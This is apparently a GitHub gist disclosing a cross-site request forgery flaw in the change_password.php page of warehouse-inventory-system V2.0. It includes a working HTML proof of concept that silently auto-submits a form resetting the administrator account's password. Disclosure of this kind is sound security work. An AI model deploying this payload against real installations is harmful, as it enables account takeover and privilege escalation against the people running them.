Skip to content

Instantly share code, notes, and snippets.

@topsky979

topsky979/warehouse-inventory-system_CSRF_2.md Secret

Created July 24, 2024 08:20
Show Gist options
  • Save topsky979/b178dd940d98828d1dfd0ccaaaddeb6b to your computer and use it in GitHub Desktop.
Save topsky979/b178dd940d98828d1dfd0ccaaaddeb6b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
warehouse-inventory-system_CSRF_2.md

[description]

warehouse-inventory-system was discovered to contain Cross-site request forgery(CSRF) vulnerability via the URI /change_password.php.

[Vulnerability Type]

Cross-site request forgery(CSRF)

[Vendor of Product]

OSWAPP,https://github.com/siamon123/warehouse-inventory-system

[Affected Product Code Base]

V2.0

[Impact Escalation of Privileges]

true

[POC]

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.0.183:11180/change_password.php" method="POST">
      <input type="hidden" name="new&#45;password" value="admin" />
      <input type="hidden" name="old&#45;password" value="123456" />
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment